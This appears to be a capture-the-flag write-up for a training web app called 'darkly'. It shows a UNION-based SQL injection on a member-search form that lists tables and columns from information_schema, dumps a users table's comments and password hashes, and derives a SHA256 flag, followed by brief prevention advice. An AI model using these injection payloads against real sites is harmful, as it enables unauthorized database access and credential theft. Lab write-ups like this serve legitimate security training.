On Members page a form allows to search information on a given member using its ID number.
IDs 0 to 5
Let's see if we can attack this page with SQL Injection technique, by putting a ', a quote character. (if the error message like below prints, it means the environment is vulnerable for SQL Injection)
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\'' at line 1
with this error message we are getting, we could try using the attack queries to see if we can get the informations, with understanding of following information:
So by it means, in information_schema, all the information of the databases can be found, and by quering to it directly, it will be possible to get information of databases, with using UNION operator, there is a chance a query can retrieve data from information_schema. There are lists of tables, and we are going to use couple of them
Following query will bring the information of all the tables created on the database
1 AND 1=1 UNION SELECT 1, table_name FROM information_schema.tablesand with the list of General Table, we can find the table users is listed on the result.
From running this query, we can grab all the column names from each table, as well.
1 AND 1=1 UNION SELECT table_name, column_name FROM information_schema.columnsby searching the users, following columns are exist on the table users
user_id, first_name, last_name, town, country, planet, Commentaire, countersign
By tring all the columns, with using columns Commentaire, and Countersign, the following message can be reterived, with this query
1 AND 1=1 UNION SELECT Commentaire, countersign FROM users
as it shows, let's decrypt the password
ID: 1 AND 1=1 UNION SELECT Commentaire, countersign FROM users
First name: Decrypt this password -> then lower all the char. Sh256 on it and it's good !
Surname : 5ff9d0165b4f92b14994e5c685cdce28Following the instruction, convert the string to lowercase and compute SHA256 digests.
┌──$ [~/42/2022/darkly]
└─> echo -n FortyTwo | tr -s A-Z a-z | openssl dgst -sha256
10a16d834f9b1e4068b25c4c46fe0284e99e44dceaf08098fc83925ba6310ff5A SQL Injection is an attack of injectin query through the input data from the client to the application. It can cause modify, removal, or admin operation to the databases. This can happen when unintended data enters a program from an untrusted source, or the data is used to dynamically construct a SQL query.
In order to prevent,
- Use of Prepare Statements (with Parameterized Queries)
- Use of properly construed stored Procedures
- Allow-list input valiation
- Escaping All User Supplied Input
See More: